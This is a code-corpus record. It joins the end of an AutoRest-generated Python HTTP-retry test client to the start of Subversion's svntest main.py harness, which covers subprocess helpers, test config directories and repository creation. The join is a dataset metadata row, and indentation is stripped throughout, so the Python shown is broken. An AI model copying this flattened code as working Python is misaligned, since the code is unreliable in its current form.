:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: None
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/http/retry/504'
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
if boolean_value is not None:
body_content = self._serialize.body(boolean_value, 'bool')
else:
body_content = None
# Construct and send request
request = self._client.patch(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, **operation_config)
if response.status_code not in [200]:
raise models.ErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
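# Illustrative usage only (not part of the generated code): a client built
# from this service definition would typically expose these operations
# through an attribute on the service client; the client class name and the
# `http_retry` attribute below are assumptions based on this package's name.
#
#   client = AutoRestHttpInfrastructureTestService(base_url)
#   client.http_retry.head408()                    # 408, then 200 after retry
#   client.http_retry.put500(boolean_value=True)   # 500, then 200 after retry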
| sharadagarwal/autorest | AutoRest/Generators/Python/Python.Tests/Expected/AcceptanceTests/Http/autoresthttpinfrastructuretestservice/operations/http_retry.py | Python | mit | 13,601 | 0.000588 |
#
# main.py: a shared, automated test suite for Subversion
#
# Subversion is a tool for revision control.
# See http://subversion.tigris.org for more information.
#
# ====================================================================
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
######################################################################
import sys
import os
import shutil
import re
import stat
import subprocess
import time
import threading
import optparse
import xml
import urllib
import logging
import hashlib
from urlparse import urlparse
try:
# Python >=3.0
import queue
from urllib.parse import quote as urllib_parse_quote
from urllib.parse import unquote as urllib_parse_unquote
except ImportError:
# Python <3.0
import Queue as queue
from urllib import quote as urllib_parse_quote
from urllib import unquote as urllib_parse_unquote
import svntest
from svntest import Failure
from svntest import Skip
SVN_VER_MINOR = 8
######################################################################
#
# HOW TO USE THIS MODULE:
#
# Write a new python script that
#
# 1) imports this 'svntest' package
#
# 2) contains a number of related 'test' routines. (Each test
# routine should take no arguments, and return None on success
# or throw a Failure exception on failure. Each test should
# also contain a short docstring.)
#
# 3) places all the tests into a list that begins with None.
#
# 4) calls svntest.main.client_test() on the list.
#
# Also, your tests will probably want to use some of the common
# routines in the 'Utilities' section below.
#
#####################################################################
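# For illustration (a sketch, not part of this module): a minimal script
# following the recipe above might look like the following, where `my_test`
# is a hypothetical test routine and run_tests() is the driver used by the
# existing test suites:
#
#   import svntest
#
#   def my_test():
#     "short docstring describing the test"
#     # ... exercise svn here, e.g. via svntest.main.run_svn() ...
#     # return None on success, or raise svntest.Failure on failure
#
#   test_list = [ None, my_test ]
#   if __name__ == '__main__':
#     svntest.main.run_tests(test_list)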
# Global stuff
default_num_threads = 5
# Don't try to use this before calling execute_tests()
logger = None
class SVNProcessTerminatedBySignal(Failure):
"Exception raised if a spawned process segfaulted, aborted, etc."
pass
class SVNLineUnequal(Failure):
"Exception raised if two lines are unequal"
pass
class SVNUnmatchedError(Failure):
"Exception raised if an expected error is not found"
pass
class SVNCommitFailure(Failure):
"Exception raised if a commit failed"
pass
class SVNRepositoryCopyFailure(Failure):
"Exception raised if unable to copy a repository"
pass
class SVNRepositoryCreateFailure(Failure):
"Exception raised if unable to create a repository"
pass
# Windows specifics
if sys.platform == 'win32':
windows = True
file_scheme_prefix = 'file:'
_exe = '.exe'
_bat = '.bat'
os.environ['SVN_DBG_STACKTRACES_TO_STDERR'] = 'y'
else:
windows = False
file_scheme_prefix = 'file://'
_exe = ''
_bat = ''
# The location of our mock svneditor script.
if windows:
svneditor_script = os.path.join(sys.path[0], 'svneditor.bat')
else:
svneditor_script = os.path.join(sys.path[0], 'svneditor.py')
# Username and password used by the working copies
wc_author = 'jrandom'
wc_passwd = 'rayjandom'
# Username and password used by the working copies for "second user"
# scenarios
wc_author2 = 'jconstant' # use the same password as wc_author
stack_trace_regexp = r'(?:.*subversion[\\//].*\.c:[0-9]*,$|.*apr_err=.*)'
# Set C locale for command line programs
os.environ['LC_ALL'] = 'C'
######################################################################
# The locations of the svn, svnadmin and svnlook binaries, relative to
# the only scripts that import this file right now (they live in ../).
# Use --bin to override these defaults.
svn_binary = os.path.abspath('../../svn/svn' + _exe)
svnadmin_binary = os.path.abspath('../../svnadmin/svnadmin' + _exe)
svnlook_binary = os.path.abspath('../../svnlook/svnlook' + _exe)
svnrdump_binary = os.path.abspath('../../svnrdump/svnrdump' + _exe)
svnsync_binary = os.path.abspath('../../svnsync/svnsync' + _exe)
svnversion_binary = os.path.abspath('../../svnversion/svnversion' + _exe)
svndumpfilter_binary = os.path.abspath('../../svndumpfilter/svndumpfilter' + \
_exe)
svnmucc_binary=os.path.abspath('../../svnmucc/svnmucc' + _exe)
entriesdump_binary = os.path.abspath('entries-dump' + _exe)
atomic_ra_revprop_change_binary = os.path.abspath('atomic-ra-revprop-change' + \
_exe)
wc_lock_tester_binary = os.path.abspath('../libsvn_wc/wc-lock-tester' + _exe)
wc_incomplete_tester_binary = os.path.abspath('../libsvn_wc/wc-incomplete-tester' + _exe)
######################################################################
# The location of svnauthz binary, relative to the only scripts that
# import this file right now (they live in ../).
# Use --tools to override these defaults.
svnauthz_binary = os.path.abspath('../../../tools/server-side/svnauthz' + _exe)
svnauthz_validate_binary = os.path.abspath(
'../../../tools/server-side/svnauthz-validate' + _exe
)
# Location to the pristine repository, will be calculated from test_area_url
# when we know what the user specified for --url.
pristine_greek_repos_url = None
# Global variable to track all of our options
options = None
# End of command-line-set global variables.
######################################################################
# All temporary repositories and working copies are created underneath
# this dir, so there's one point at which to mount, e.g., a ramdisk.
work_dir = "svn-test-work"
# Constant for the merge info property.
SVN_PROP_MERGEINFO = "svn:mergeinfo"
# Constant for the inheritable auto-props property.
SVN_PROP_INHERITABLE_AUTOPROPS = "svn:auto-props"
# Constant for the inheritable ignores property.
SVN_PROP_INHERITABLE_IGNORES = "svn:global-ignores"
# Where we want all the repositories and working copies to live.
# Each test will have its own!
general_repo_dir = os.path.join(work_dir, "repositories")
general_wc_dir = os.path.join(work_dir, "working_copies")
# temp directory in which we will create our 'pristine' local
# repository and other scratch data. This should be removed when we
# quit and at startup.
temp_dir = os.path.join(work_dir, 'local_tmp')
# (derivatives of the tmp dir.)
pristine_greek_repos_dir = os.path.join(temp_dir, "repos")
greek_dump_dir = os.path.join(temp_dir, "greekfiles")
default_config_dir = os.path.abspath(os.path.join(temp_dir, "config"))
#
# Our pristine greek-tree state.
#
# If a test wishes to create an "expected" working-copy tree, it should
# call main.greek_state.copy(). That method will return a copy of this
# State object which can then be edited.
#
_item = svntest.wc.StateItem
greek_state = svntest.wc.State('', {
'iota' : _item("This is the file 'iota'.\n"),
'A' : _item(),
'A/mu' : _item("This is the file 'mu'.\n"),
'A/B' : _item(),
'A/B/lambda' : _item("This is the file 'lambda'.\n"),
'A/B/E' : _item(),
'A/B/E/alpha' : _item("This is the file 'alpha'.\n"),
'A/B/E/beta' : _item("This is the file 'beta'.\n"),
'A/B/F' : _item(),
'A/C' : _item(),
'A/D' : _item(),
'A/D/gamma' : _item("This is the file 'gamma'.\n"),
'A/D/G' : _item(),
'A/D/G/pi' : _item("This is the file 'pi'.\n"),
'A/D/G/rho' : _item("This is the file 'rho'.\n"),
'A/D/G/tau' : _item("This is the file 'tau'.\n"),
'A/D/H' : _item(),
'A/D/H/chi' : _item("This is the file 'chi'.\n"),
'A/D/H/psi' : _item("This is the file 'psi'.\n"),
'A/D/H/omega' : _item("This is the file 'omega'.\n"),
})
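# Illustrative example (hypothetical edit): a test that wants an "expected"
# tree copies the pristine state and then edits the copy, e.g. with the
# State.tweak() method:
#
#   expected = svntest.main.greek_state.copy()
#   expected.tweak('iota', contents="This is the new 'iota'.\n")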
######################################################################
# Utilities shared by the tests
def wrap_ex(func):
"Wrap a function, catch, print and ignore exceptions"
def w(*args, **kwds):
try:
return func(*args, **kwds)
except Failure, ex:
if ex.__class__ != Failure or ex.args:
ex_args = str(ex)
if ex_args:
logger.warn('EXCEPTION: %s: %s', ex.__class__.__name__, ex_args)
else:
logger.warn('EXCEPTION: %s', ex.__class__.__name__)
return w
def setup_development_mode():
"Wraps functions in module actions"
l = [ 'run_and_verify_svn',
'run_and_verify_svnversion',
'run_and_verify_load',
'run_and_verify_dump',
'run_and_verify_checkout',
'run_and_verify_export',
'run_and_verify_update',
'run_and_verify_merge',
'run_and_verify_switch',
'run_and_verify_commit',
'run_and_verify_unquiet_status',
'run_and_verify_status',
'run_and_verify_diff_summarize',
'run_and_verify_diff_summarize_xml',
'run_and_validate_lock']
for func in l:
setattr(svntest.actions, func, wrap_ex(getattr(svntest.actions, func)))
def get_admin_name():
"Return name of SVN administrative subdirectory."
if (windows or sys.platform == 'cygwin') \
and 'SVN_ASP_DOT_NET_HACK' in os.environ:
return '_svn'
else:
return '.svn'
def wc_is_singledb(wcpath):
"""Temporary function that checks whether a working copy directory looks
like it is part of a single-db working copy."""
pristine = os.path.join(wcpath, get_admin_name(), 'pristine')
if not os.path.exists(pristine):
return True
# Now we must be looking at a multi-db WC dir or the root dir of a
# single-DB WC. Sharded 'pristine' dir => single-db, else => multi-db.
for name in os.listdir(pristine):
if len(name) == 2:
return True
elif len(name) == 40:
return False
return False
def get_start_commit_hook_path(repo_dir):
"Return the path of the start-commit-hook conf file in REPO_DIR."
return os.path.join(repo_dir, "hooks", "start-commit")
def get_pre_commit_hook_path(repo_dir):
"Return the path of the pre-commit-hook conf file in REPO_DIR."
return os.path.join(repo_dir, "hooks", "pre-commit")
def get_post_commit_hook_path(repo_dir):
"Return the path of the post-commit-hook conf file in REPO_DIR."
return os.path.join(repo_dir, "hooks", "post-commit")
def get_pre_revprop_change_hook_path(repo_dir):
"Return the path of the pre-revprop-change hook script in REPO_DIR."
return os.path.join(repo_dir, "hooks", "pre-revprop-change")
def get_pre_lock_hook_path(repo_dir):
"Return the path of the pre-lock hook script in REPO_DIR."
return os.path.join(repo_dir, "hooks", "pre-lock")
def get_pre_unlock_hook_path(repo_dir):
"Return the path of the pre-unlock hook script in REPO_DIR."
return os.path.join(repo_dir, "hooks", "pre-unlock")
def get_svnserve_conf_file_path(repo_dir):
"Return the path of the svnserve.conf file in REPO_DIR."
return os.path.join(repo_dir, "conf", "svnserve.conf")
def get_fsfs_conf_file_path(repo_dir):
"Return the path of the fsfs.conf file in REPO_DIR."
return os.path.join(repo_dir, "db", "fsfs.conf")
def get_fsfs_format_file_path(repo_dir):
"Return the path of the format file in REPO_DIR."
return os.path.join(repo_dir, "db", "format")
def filter_dbg(lines):
excluded = filter(lambda line: line.startswith('DBG:'), lines)
included = filter(lambda line: not line.startswith('DBG:'), lines)
sys.stdout.write(''.join(excluded))
return included
# Run any binary, logging the command line and return code
def run_command(command, error_expected, binary_mode=False, *varargs):
"""Run COMMAND with VARARGS. Return exit code as int; stdout, stderr
as lists of lines (including line terminators). See run_command_stdin()
for details. If ERROR_EXPECTED is None, any stderr output will be
printed and any stderr output or a non-zero exit code will raise an
exception."""
return run_command_stdin(command, error_expected, 0, binary_mode,
None, *varargs)
# A regular expression that matches arguments that are trivially safe
# to pass on a command line without quoting on any supported operating
# system:
_safe_arg_re = re.compile(r'^[A-Za-z\d\.\_\/\-\:\@]+$')
def _quote_arg(arg):
"""Quote ARG for a command line.
Return a quoted version of the string ARG, or just ARG if it contains
only universally harmless characters.
WARNING: This function cannot handle arbitrary command-line
arguments: it is just good enough for what we need here."""
arg = str(arg)
if _safe_arg_re.match(arg):
return arg
if windows:
# Note: subprocess.list2cmdline is Windows-specific.
return subprocess.list2cmdline([arg])
else:
# Quoting suitable for most Unix shells.
return "'" + arg.replace("'", "'\\''") + "'"
def open_pipe(command, bufsize=-1, stdin=None, stdout=None, stderr=None):
"""Opens a subprocess.Popen pipe to COMMAND using STDIN,
STDOUT, and STDERR. BUFSIZE is passed to subprocess.Popen's
argument of the same name.
Returns (infile, outfile, errfile, waiter); waiter
should be passed to wait_on_pipe."""
command = [str(x) for x in command]
# On Windows subprocess.Popen() won't accept a Python script as
# a valid program to execute, rather it wants the Python executable.
if (sys.platform == 'win32') and (command[0].endswith('.py')):
command.insert(0, sys.executable)
command_string = command[0] + ' ' + ' '.join(map(_quote_arg, command[1:]))
if not stdin:
stdin = subprocess.PIPE
if not stdout:
stdout = subprocess.PIPE
if not stderr:
stderr = subprocess.PIPE
p = subprocess.Popen(command,
bufsize,
stdin=stdin,
stdout=stdout,
stderr=stderr,
close_fds=not windows)
return p.stdin, p.stdout, p.stderr, (p, command_string)
def wait_on_pipe(waiter, binary_mode, stdin=None):
"""WAITER is (KID, COMMAND_STRING). Wait for KID (opened with open_pipe)
  to finish, raising an exception if it died on a signal. If KID fails,
  create an error message
containing any stdout and stderr from the kid. Show COMMAND_STRING in
diagnostic messages. Normalize Windows line endings of stdout and stderr
if not BINARY_MODE. Return KID's exit code as int; stdout, stderr as
lists of lines (including line terminators)."""
if waiter is None:
return
kid, command_string = waiter
stdout, stderr = kid.communicate(stdin)
exit_code = kid.returncode
# Normalize Windows line endings if in text mode.
if windows and not binary_mode:
stdout = stdout.replace('\r\n', '\n')
stderr = stderr.replace('\r\n', '\n')
# Convert output strings to lists.
stdout_lines = stdout.splitlines(True)
stderr_lines = stderr.splitlines(True)
if exit_code < 0:
if not windows:
exit_signal = os.WTERMSIG(-exit_code)
else:
exit_signal = exit_code
if stdout_lines is not None:
logger.info("".join(stdout_lines))
if stderr_lines is not None:
logger.warning("".join(stderr_lines))
# show the whole path to make it easier to start a debugger
logger.warning("CMD: %s terminated by signal %d"
% (command_string, exit_signal))
raise SVNProcessTerminatedBySignal
else:
if exit_code:
logger.info("CMD: %s exited with %d" % (command_string, exit_code))
return stdout_lines, stderr_lines, exit_code
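# Illustrative pairing of the two helpers above (see copy_repos() below for
# a real dump|load use); `repo_dir` is a hypothetical repository path:
#
#   infile, outfile, errfile, waiter = open_pipe([svnlook_binary,
#                                                 'youngest', repo_dir])
#   stdout_lines, stderr_lines, exit_code = wait_on_pipe(waiter, False)
#   infile.close(); outfile.close(); errfile.close()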
def spawn_process(command, bufsize=-1, binary_mode=False, stdin_lines=None,
*varargs):
"""Run any binary, supplying input text, logging the command line.
BUFSIZE dictates the pipe buffer size used in communication with the
subprocess: quoting from subprocess.Popen(), "0 means unbuffered,
1 means line buffered, any other positive value means use a buffer of
(approximately) that size. A negative bufsize means to use the system
default, which usually means fully buffered."
Normalize Windows line endings of stdout and stderr if not BINARY_MODE.
Return exit code as int; stdout, stderr as lists of lines (including
line terminators).
"""
if stdin_lines and not isinstance(stdin_lines, list):
raise TypeError("stdin_lines should have list type")
# Log the command line
if not command.endswith('.py'):
logger.info('CMD: %s %s' % (os.path.basename(command),
' '.join([_quote_arg(x) for x in varargs])))
infile, outfile, errfile, kid = open_pipe([command] + list(varargs), bufsize)
if stdin_lines:
for x in stdin_lines:
infile.write(x)
stdout_lines, stderr_lines, exit_code = wait_on_pipe(kid, binary_mode)
infile.close()
outfile.close()
errfile.close()
return exit_code, stdout_lines, stderr_lines
def run_command_stdin(command, error_expected, bufsize=-1, binary_mode=False,
stdin_lines=None, *varargs):
"""Run COMMAND with VARARGS; input STDIN_LINES (a list of strings
which should include newline characters) to program via stdin - this
should not be very large, as if the program outputs more than the OS
is willing to buffer, this will deadlock, with both Python and
COMMAND waiting to write to each other for ever. For tests where this
is a problem, setting BUFSIZE to a sufficiently large value will prevent
the deadlock, see spawn_process().
Normalize Windows line endings of stdout and stderr if not BINARY_MODE.
Return exit code as int; stdout, stderr as lists of lines (including
line terminators).
If ERROR_EXPECTED is None, any stderr output will be printed and any
stderr output or a non-zero exit code will raise an exception."""
start = time.time()
exit_code, stdout_lines, stderr_lines = spawn_process(command,
bufsize,
binary_mode,
stdin_lines,
*varargs)
def _line_contains_repos_diskpath(line):
# ### Note: this assumes that either svn-test-work isn't a symlink,
# ### or the diskpath isn't realpath()'d somewhere on the way from
# ### the server's configuration and the client's stderr. We could
# ### check for both the symlinked path and the realpath.
return \
os.path.join('cmdline', 'svn-test-work', 'repositories') in line \
or os.path.join('cmdline', 'svn-test-work', 'local_tmp', 'repos') in line
for lines, name in [[stdout_lines, "stdout"], [stderr_lines, "stderr"]]:
if is_ra_type_file() or 'svnadmin' in command or 'svnlook' in command:
break
# Does the server leak the repository on-disk path?
# (prop_tests-12 installs a hook script that does that intentionally)
if any(map(_line_contains_repos_diskpath, lines)) \
and not any(map(lambda arg: 'prop_tests-12' in arg, varargs)):
raise Failure("Repository diskpath in %s: %r" % (name, lines))
stop = time.time()
logger.info('<TIME = %.6f>' % (stop - start))
for x in stdout_lines:
logger.info(x.rstrip())
for x in stderr_lines:
logger.info(x.rstrip())
if (not error_expected) and ((stderr_lines) or (exit_code != 0)):
for x in stderr_lines:
logger.warning(x.rstrip())
if len(varargs) <= 5:
brief_command = ' '.join((command,) + varargs)
else:
brief_command = ' '.join(((command,) + varargs)[:4]) + ' ...'
raise Failure('Command failed: "' + brief_command +
'"; exit code ' + str(exit_code))
return exit_code, \
filter_dbg(stdout_lines), \
stderr_lines
def create_config_dir(cfgdir, config_contents=None, server_contents=None,
ssl_cert=None, ssl_url=None, http_proxy=None):
"Create config directories and files"
# config file names
cfgfile_cfg = os.path.join(cfgdir, 'config')
cfgfile_srv = os.path.join(cfgdir, 'servers')
# create the directory
if not os.path.isdir(cfgdir):
os.makedirs(cfgdir)
# define default config file contents if none provided
if config_contents is None:
config_contents = """
#
[auth]
password-stores =
[miscellany]
interactive-conflicts = false
"""
# define default server file contents if none provided
if server_contents is None:
http_library_str = ""
if options.http_library:
http_library_str = "http-library=%s" % (options.http_library)
http_proxy_str = ""
if options.http_proxy:
http_proxy_parsed = urlparse("//" + options.http_proxy)
http_proxy_str = "http-proxy-host=%s\n" % (http_proxy_parsed.hostname) + \
"http-proxy-port=%d" % (http_proxy_parsed.port or 80)
server_contents = """
#
[global]
%s
%s
store-plaintext-passwords=yes
store-passwords=yes
""" % (http_library_str, http_proxy_str)
file_write(cfgfile_cfg, config_contents)
file_write(cfgfile_srv, server_contents)
if (ssl_cert and ssl_url):
trust_ssl_cert(cfgdir, ssl_cert, ssl_url)
elif cfgdir != default_config_dir:
copy_trust(cfgdir, default_config_dir)
def trust_ssl_cert(cfgdir, ssl_cert, ssl_url):
"""Setup config dir to trust the given ssl_cert for the given ssl_url
"""
cert_rep = ''
fp = open(ssl_cert, 'r')
for line in fp.readlines()[1:-1]:
cert_rep = cert_rep + line.strip()
parsed_url = urlparse(ssl_url)
netloc_url = '%s://%s' % (parsed_url.scheme, parsed_url.netloc)
ssl_dir = os.path.join(cfgdir, 'auth', 'svn.ssl.server')
if not os.path.isdir(ssl_dir):
os.makedirs(ssl_dir)
md5_name = hashlib.md5(netloc_url).hexdigest()
md5_file = os.path.join(ssl_dir, md5_name)
md5_file_contents = """K 10
ascii_cert
V %d
%s
K 8
failures
V 1
8
K 15
svn:realmstring
V %d
%s
END
""" % (len(cert_rep), cert_rep, len(netloc_url), netloc_url)
file_write(md5_file, md5_file_contents)
def copy_trust(dst_cfgdir, src_cfgdir):
"""Copy svn.ssl.server files from one config dir to another.
"""
src_ssl_dir = os.path.join(src_cfgdir, 'auth', 'svn.ssl.server')
dst_ssl_dir = os.path.join(dst_cfgdir, 'auth', 'svn.ssl.server')
if not os.path.isdir(dst_ssl_dir):
os.makedirs(dst_ssl_dir)
for f in os.listdir(src_ssl_dir):
shutil.copy(os.path.join(src_ssl_dir, f), os.path.join(dst_ssl_dir, f))
def _with_config_dir(args):
if '--config-dir' in args:
return args
else:
return args + ('--config-dir', default_config_dir)
def _with_auth(args):
assert '--password' not in args
args = args + ('--password', wc_passwd,
'--no-auth-cache' )
if '--username' in args:
return args
else:
return args + ('--username', wc_author )
# For running subversion and returning the output
def run_svn(error_expected, *varargs):
"""Run svn with VARARGS; return exit code as int; stdout, stderr as
lists of lines (including line terminators). If ERROR_EXPECTED is
None, any stderr output will be printed and any stderr output or a
non-zero exit code will raise an exception. If
you're just checking that something does/doesn't come out of
stdout/stderr, you might want to use actions.run_and_verify_svn()."""
return run_command(svn_binary, error_expected, False,
*(_with_auth(_with_config_dir(varargs))))
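# Illustrative call (`wc_dir` is a hypothetical working copy path); passing
# None as ERROR_EXPECTED makes stderr output or a non-zero exit code raise:
#   exit_code, out, err = run_svn(None, 'status', '-v', wc_dir)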
# For running svnadmin. Ignores the output.
def run_svnadmin(*varargs):
"""Run svnadmin with VARARGS, returns exit code as int; stdout, stderr as
list of lines (including line terminators)."""
use_binary = ('dump' in varargs)
exit_code, stdout_lines, stderr_lines = \
run_command(svnadmin_binary, 1, use_binary, *varargs)
if use_binary and sys.platform == 'win32':
# Callers don't expect binary output on stderr
stderr_lines = [x.replace('\r', '') for x in stderr_lines]
return exit_code, stdout_lines, stderr_lines
# For running svnlook. Ignores the output.
def run_svnlook(*varargs):
"""Run svnlook with VARARGS, returns exit code as int; stdout, stderr as
list of lines (including line terminators)."""
return run_command(svnlook_binary, 1, False, *varargs)
def run_svnrdump(stdin_input, *varargs):
"""Run svnrdump with VARARGS, returns exit code as int; stdout, stderr as
list of lines (including line terminators). Use binary mode for output."""
if stdin_input:
return run_command_stdin(svnrdump_binary, 1, 1, True, stdin_input,
*(_with_auth(_with_config_dir(varargs))))
else:
return run_command(svnrdump_binary, 1, True,
*(_with_auth(_with_config_dir(varargs))))
def run_svnsync(*varargs):
"""Run svnsync with VARARGS, returns exit code as int; stdout, stderr as
list of lines (including line terminators)."""
return run_command(svnsync_binary, 1, False, *(_with_config_dir(varargs)))
def run_svnversion(*varargs):
"""Run svnversion with VARARGS, returns exit code as int; stdout, stderr
as list of lines (including line terminators)."""
return run_command(svnversion_binary, 1, False, *varargs)
def run_svnmucc(*varargs):
"""Run svnmucc with VARARGS, returns exit code as int; stdout, stderr as
list of lines (including line terminators). Use binary mode for output."""
return run_command(svnmucc_binary, 1, True,
*(_with_auth(_with_config_dir(varargs))))
def run_svnauthz(*varargs):
"""Run svnauthz with VARARGS, returns exit code as int; stdout, stderr
as list of lines (including line terminators)."""
return run_command(svnauthz_binary, 1, False, *varargs)
def run_svnauthz_validate(*varargs):
"""Run svnauthz-validate with VARARGS, returns exit code as int; stdout,
stderr as list of lines (including line terminators)."""
return run_command(svnauthz_validate_binary, 1, False, *varargs)
def run_entriesdump(path):
"""Run the entries-dump helper, returning a dict of Entry objects."""
# use spawn_process rather than run_command to avoid copying all the data
# to stdout in verbose mode.
exit_code, stdout_lines, stderr_lines = spawn_process(entriesdump_binary,
0, False, None, path)
if exit_code or stderr_lines:
### report on this? or continue to just skip it?
return None
class Entry(object):
pass
entries = { }
exec(''.join(filter_dbg(stdout_lines)))
return entries
def run_entriesdump_subdirs(path):
"""Run the entries-dump helper, returning a list of directory names."""
# use spawn_process rather than run_command to avoid copying all the data
# to stdout in verbose mode.
exit_code, stdout_lines, stderr_lines = spawn_process(entriesdump_binary,
0, False, None, '--subdirs', path)
return map(lambda line: line.strip(), filter_dbg(stdout_lines))
def run_entriesdump_tree(path):
"""Run the entries-dump helper, returning a dict of a dict of Entry objects."""
# use spawn_process rather than run_command to avoid copying all the data
# to stdout in verbose mode.
exit_code, stdout_lines, stderr_lines = spawn_process(entriesdump_binary,
0, False, None,
'--tree-dump', path)
if exit_code or stderr_lines:
### report on this? or continue to just skip it?
return None
class Entry(object):
pass
dirs = { }
exec(''.join(filter_dbg(stdout_lines)))
return dirs
def run_atomic_ra_revprop_change(url, revision, propname, skel, want_error):
"""Run the atomic-ra-revprop-change helper, returning its exit code, stdout,
and stderr. For HTTP, default HTTP library is used."""
# use spawn_process rather than run_command to avoid copying all the data
# to stdout in verbose mode.
#exit_code, stdout_lines, stderr_lines = spawn_process(entriesdump_binary,
# 0, False, None, path)
# This passes HTTP_LIBRARY in addition to our params.
return run_command(atomic_ra_revprop_change_binary, True, False,
url, revision, propname, skel,
want_error and 1 or 0, default_config_dir)
def run_wc_lock_tester(recursive, path):
"Run the wc-lock obtainer tool, returning its exit code, stdout and stderr"
if recursive:
option = "-r"
else:
option = "-1"
return run_command(wc_lock_tester_binary, False, False, option, path)
def run_wc_incomplete_tester(wc_dir, revision):
"Run the wc-incomplete tool, returning its exit code, stdout and stderr"
return run_command(wc_incomplete_tester_binary, False, False,
wc_dir, revision)
def youngest(repos_path):
"run 'svnlook youngest' on REPOS_PATH, returns revision as int"
exit_code, stdout_lines, stderr_lines = run_command(svnlook_binary, None, False,
'youngest', repos_path)
if exit_code or stderr_lines:
raise Failure("Unexpected failure of 'svnlook youngest':\n%s" % stderr_lines)
if len(stdout_lines) != 1:
raise Failure("Wrong output from 'svnlook youngest':\n%s" % stdout_lines)
return int(stdout_lines[0].rstrip())
# Chmod recursively on a whole subtree
def chmod_tree(path, mode, mask):
for dirpath, dirs, files in os.walk(path):
for name in dirs + files:
fullname = os.path.join(dirpath, name)
if not os.path.islink(fullname):
new_mode = (os.stat(fullname)[stat.ST_MODE] & ~mask) | mode
os.chmod(fullname, new_mode)
# For clearing away working copies
def safe_rmtree(dirname, retry=0):
"""Remove the tree at DIRNAME, making it writable first.
If DIRNAME is a symlink, only remove the symlink, not its target."""
def rmtree(dirname):
chmod_tree(dirname, 0666, 0666)
shutil.rmtree(dirname)
if os.path.islink(dirname):
os.unlink(dirname)
return
if not os.path.exists(dirname):
return
if retry:
for delay in (0.5, 1, 2, 4):
try:
rmtree(dirname)
break
except:
time.sleep(delay)
else:
rmtree(dirname)
else:
rmtree(dirname)
# For making local mods to files
def file_append(path, new_text):
"Append NEW_TEXT to file at PATH"
open(path, 'a').write(new_text)
# Append in binary mode
def file_append_binary(path, new_text):
"Append NEW_TEXT to file at PATH in binary mode"
open(path, 'ab').write(new_text)
# For creating new files, and making local mods to existing files.
def file_write(path, contents, mode='w'):
"""Write the CONTENTS to the file at PATH, opening file using MODE,
which is (w)rite by default."""
open(path, mode).write(contents)
# For replacing parts of contents in an existing file, with new content.
def file_substitute(path, contents, new_contents):
"""Replace the CONTENTS in the file at PATH using the NEW_CONTENTS"""
fcontent = open(path, 'r').read().replace(contents, new_contents)
open(path, 'w').write(fcontent)
# For creating blank new repositories
def create_repos(path, minor_version = None):
"""Create a brand-new SVN repository at PATH. If PATH does not yet
exist, create it."""
if not os.path.exists(path):
    os.makedirs(path) # this creates all the intermediate dirs, if necessary
opts = ("--bdb-txn-nosync",)
if not minor_version or minor_version > options.server_minor_version:
minor_version = options.server_minor_version
opts += ("--compatible-version=1.%d" % (minor_version),)
if options.fs_type is not None:
opts += ("--fs-type=" + options.fs_type,)
exit_code, stdout, stderr = run_command(svnadmin_binary, 1, False, "create",
path, *opts)
# Skip tests if we can't create the repository.
if stderr:
stderr_lines = 0
not_using_fsfs_backend = (options.fs_type != "fsfs")
backend_deprecation_warning = False
for line in stderr:
stderr_lines += 1
if line.find('Unknown FS type') != -1:
raise Skip
if not_using_fsfs_backend:
if 0 < line.find('repository back-end is deprecated, consider using'):
backend_deprecation_warning = True
# Creating BDB repositories will cause svnadmin to print a warning
# which should be ignored.
if (stderr_lines == 1
and not_using_fsfs_backend
and backend_deprecation_warning):
pass
else:
# If the FS type is known and we noticed more than just the
# BDB-specific warning, assume the repos couldn't be created
# (e.g. due to a missing 'svnadmin' binary).
raise SVNRepositoryCreateFailure("".join(stderr).rstrip())
# Require authentication to write to the repos, for ra_svn testing.
file_write(get_svnserve_conf_file_path(path),
"[general]\nauth-access = write\n");
if options.enable_sasl:
file_append(get_svnserve_conf_file_path(path),
"realm = svntest\n[sasl]\nuse-sasl = true\n")
else:
file_append(get_svnserve_conf_file_path(path), "password-db = passwd\n")
# This actually creates TWO [users] sections in the file (one of them is
# uncommented in `svnadmin create`'s template), so we exercise the .ini
# files reading code's handling of duplicates, too. :-)
file_append(os.path.join(path, "conf", "passwd"),
"[users]\njrandom = rayjandom\njconstant = rayjandom\n");
if options.fs_type is None or options.fs_type == 'fsfs':
# fsfs.conf file
if options.config_file is not None and \
(not minor_version or minor_version >= 6):
shutil.copy(options.config_file, get_fsfs_conf_file_path(path))
# format file
if options.fsfs_sharding is not None:
def transform_line(line):
if line.startswith('layout '):
if options.fsfs_sharding > 0:
line = 'layout sharded %d' % options.fsfs_sharding
else:
line = 'layout linear'
return line
# read it
format_file_path = get_fsfs_format_file_path(path)
contents = open(format_file_path, 'rb').read()
# tweak it
new_contents = "".join([transform_line(line) + "\n"
for line in contents.split("\n")])
if new_contents[-1] == "\n":
# we don't currently allow empty lines (\n\n) in the format file.
new_contents = new_contents[:-1]
# replace it
os.chmod(format_file_path, 0666)
file_write(format_file_path, new_contents, 'wb')
# post-commit
# Note that some tests (currently only commit_tests) create their own
# post-commit hooks, which would override this one. :-(
if options.fsfs_packing:
# some tests chdir.
abs_path = os.path.abspath(path)
create_python_hook_script(get_post_commit_hook_path(abs_path),
"import subprocess\n"
"import sys\n"
"command = %s\n"
"sys.exit(subprocess.Popen(command).wait())\n"
% repr([svnadmin_binary, 'pack', abs_path]))
# make the repos world-writeable, for mod_dav_svn's sake.
chmod_tree(path, 0666, 0666)
# For copying a repository
def copy_repos(src_path, dst_path, head_revision, ignore_uuid = 1,
minor_version = None):
